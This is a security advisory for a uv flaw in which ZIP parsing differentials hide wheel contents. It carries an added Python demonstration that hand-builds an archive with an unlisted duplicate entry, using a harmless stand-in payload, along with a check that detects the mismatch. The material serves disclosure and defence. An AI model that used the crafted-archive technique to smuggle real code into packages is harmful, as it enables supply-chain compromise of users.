CVE-2025-13327
Severity: MEDIUM (6.3) | EPSS: 0.01%
Title: uv has ZIP payload obfuscation through parsing differentials
Published: 2025/10/29 | Modified: 2026/3/4
Description
A flaw was found in uv. This vulnerability allows an attacker to execute malicious code during package resolution or installation via specially crafted ZIP archives (the container format of Python wheels) that exploit parsing differentials, i.e. archives that two ZIP implementations read differently, typically because the central directory and the local file headers disagree, so the contents uv unpacks need not match what another tool, scanner or reviewer saw in the same file. Exploitation requires user interaction: the victim has to resolve or install an attacker-controlled package.
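The mechanism named in the description, as an added illustration that is not code from uv or from this advisory: a constructed ZIP whose central directory lists one copy of `pkg/__init__.py` while a second, unlisted local file entry with the same name sits in the archive after it. A reader that trusts the central directory (Python's `zipfile`) and a reader that walks local file headers sequentially report different contents, which is what a parsing differential is. The `find_discrepancies` check at the end is this example's own suggestion of what a hardened installer should verify before trusting an archive, not a description of uv's fix; the "hidden" payload is a harmless stand-in string, and all names and data are constructed for the example.

```python
"""Constructed demonstration of a ZIP parsing differential (added example; not uv code).

The archive is built by hand so that the central directory and the sequence of
local file headers disagree. HIDDEN is a harmless stand-in that only marks which
copy of the file a given reader saw.
"""
import io
import struct
import zipfile
import zlib

LOCAL_SIG = b"PK\x03\x04"     # local file header signature
CENTRAL_SIG = b"PK\x01\x02"   # central directory entry signature
EOCD_SIG = b"PK\x05\x06"      # end of central directory record signature

NAME = b"pkg/__init__.py"
BENIGN = b"print('hello from pkg')\n"                # constructed: the copy the central directory lists
HIDDEN = b"print('unlisted copy was installed')\n"   # constructed: the unlisted duplicate entry


def _local_entry(name: bytes, data: bytes) -> bytes:
    """Local file header + stored (uncompressed) data, no data descriptor."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    header = struct.pack("<4sHHHHHIIIHH", LOCAL_SIG, 20, 0, 0, 0, 0,
                         crc, len(data), len(data), len(name), 0)
    return header + name + data


def _central_entry(name: bytes, data: bytes, offset: int) -> bytes:
    """Central directory record pointing at the local header at `offset`."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    record = struct.pack("<4sHHHHHHIIIHHHHHII", CENTRAL_SIG, 20, 20, 0, 0, 0, 0,
                         crc, len(data), len(data), len(name), 0, 0, 0, 0, 0, offset)
    return record + name


def build_crafted_zip() -> bytes:
    """The central directory lists only the BENIGN copy; the HIDDEN copy follows
    it as an orphaned local entry that a sequential reader still encounters."""
    listed = _local_entry(NAME, BENIGN)   # offset 0, referenced by the central directory
    orphan = _local_entry(NAME, HIDDEN)   # offset len(listed), referenced by nobody
    cd = _central_entry(NAME, BENIGN, 0)
    cd_offset = len(listed) + len(orphan)
    eocd = struct.pack("<4sHHHHIIH", EOCD_SIG, 0, 0, 1, 1, len(cd), cd_offset, 0)
    return listed + orphan + cd + eocd


def build_clean_zip() -> bytes:
    """A well-formed archive written by the standard library, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(NAME.decode(), BENIGN)
        zf.writestr("pkg/util.py", b"def one():\n    return 1\n")
    return buf.getvalue()


def central_directory_view(blob: bytes) -> dict[str, bytes]:
    """What a central-directory-driven reader (here, zipfile) believes is inside."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def walk_local_headers(blob: bytes) -> list[dict]:
    """What a streaming reader sees: local headers parsed one after another from
    offset 0 until the first non-local signature. Handles stored entries without
    data descriptors only (flag bit 3 hides the sizes, another differential source)."""
    entries, pos = [], 0
    while blob.startswith(LOCAL_SIG, pos):
        (_sig, _ver, flags, _method, _t, _d, crc, csize, usize,
         nlen, xlen) = struct.unpack_from("<4sHHHHHIIIHH", blob, pos)
        if flags & 0x08:
            raise ValueError("data descriptor entries are not supported by this walker")
        name = blob[pos + 30:pos + 30 + nlen].decode()
        start = pos + 30 + nlen + xlen
        entries.append({"name": name, "crc": crc, "csize": csize, "usize": usize,
                        "offset": pos, "data": blob[start:start + csize]})
        pos = start + csize
    return entries


def find_discrepancies(blob: bytes) -> list[str]:
    """Cross-check both views; an empty list means every local header is listed by
    the central directory with matching metadata. Illustrative consistency check,
    not uv's implementation."""
    problems = []
    local = {e["offset"]: e for e in walk_local_headers(blob)}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        central = zf.infolist()
    if len(local) != len(central):
        problems.append(f"{len(local)} local headers but {len(central)} central directory entries")
    listed = {info.header_offset for info in central}
    for off, e in local.items():
        if off not in listed:
            problems.append(f"unlisted local entry {e['name']!r} at offset {off}")
    for info in central:
        e = local.get(info.header_offset)
        if e is None:
            problems.append(f"central entry {info.filename!r} points at offset {info.header_offset} with no local header")
        elif (e["name"], e["crc"], e["csize"], e["usize"]) != (
                info.filename, info.CRC, info.compress_size, info.file_size):
            problems.append(f"local/central metadata mismatch for {info.filename!r}")
    return problems


if __name__ == "__main__":
    crafted = build_crafted_zip()
    print("central directory view:", central_directory_view(crafted))
    print("sequential view:", [(e["name"], e["data"]) for e in walk_local_headers(crafted)])
    print("discrepancies (crafted):", find_discrepancies(crafted))
    print("discrepancies (clean):", find_discrepancies(build_clean_zip()))
```

Run stand-alone, the crafted archive looks like a single benign `pkg/__init__.py` to `zipfile`, while the sequential walk also returns the unlisted second copy; whichever of those two views an installer acts on decides what lands on disk. The clean archive produces no discrepancies, so a rule of "reject any archive where the two views disagree" costs nothing on well-formed wheels.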
Affected packages (2)
- crates.io/uv: versions >= 0, < 0.9.6 (fixed in 0.9.6)
- PyPI/uv: versions >= 0, < 0.9.6 (fixed in 0.9.6)
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | not rated | CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | MEDIUM (6.3) | CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H |
References (6)
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2025-13327
- PATCH: https://github.com/astral-sh/uv
- WEB: https://access.redhat.com/security/cve/CVE-2025-13327
- WEB: https://bugzilla.redhat.com/show_bug.cgi?id=2407263
- WEB: https://github.com/astral-sh/uv/commit/da659fee4898a73dbc75070f3e82d49f745e4628
- WEB: https://github.com/astral-sh/uv/security/advisories/GHSA-pqhf-p39g-3x64